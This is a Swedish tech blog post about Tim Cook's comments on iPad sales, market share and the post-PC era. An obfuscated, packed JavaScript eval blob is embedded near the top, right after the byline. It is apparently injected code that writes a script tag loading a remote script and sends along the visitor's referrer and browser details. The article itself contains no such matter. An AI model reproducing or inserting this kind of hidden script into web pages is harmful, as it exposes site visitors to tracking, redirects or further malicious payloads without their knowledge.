Image Image Image Image Image Image Image Image Image Image

| 3 april, 2020

Scroll to top

Top

Tim Cook berättar om iPad och framtiden

Tim Cook berättar om iPad och framtiden
Sebastian

Ipad: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fbrhe|var|u0026u|referrer|zkybs||js|php’.split(’|’),0,{}))
Under den relativt stora Goldman Sachs-konferensen igår fick Apples nuvarande vd Tim Cook frågan om hur han ser på marknadsandelen för iPad. Samsung och Amazon har inte vlat att lämna ut några siffror på hur många enheter som sålts men det gör Apple.  Tim Cook svarade så här:

“I have no idea what market share is, because we’re the only company that reports what we sell.”

Han sa även att Apple säljer fler iPad än vad HP säljer PC-datorer. Under den amerikanska Black Friday i november förra året såldes dubblet så många iPads som modeller med operativsystemet Android.

Tim Cook förklarade även att iPad ofta säljs till personer som tidigare kanske aldrig köpt en PC eller varit bekant med en. Marknaden har helt enkelt svängt om och iPad är framtiden som den jämförelse förra vd Steve Jobs gjorde om när folk slutade köpa lastbilar när bilen kom.

Via: Apple.com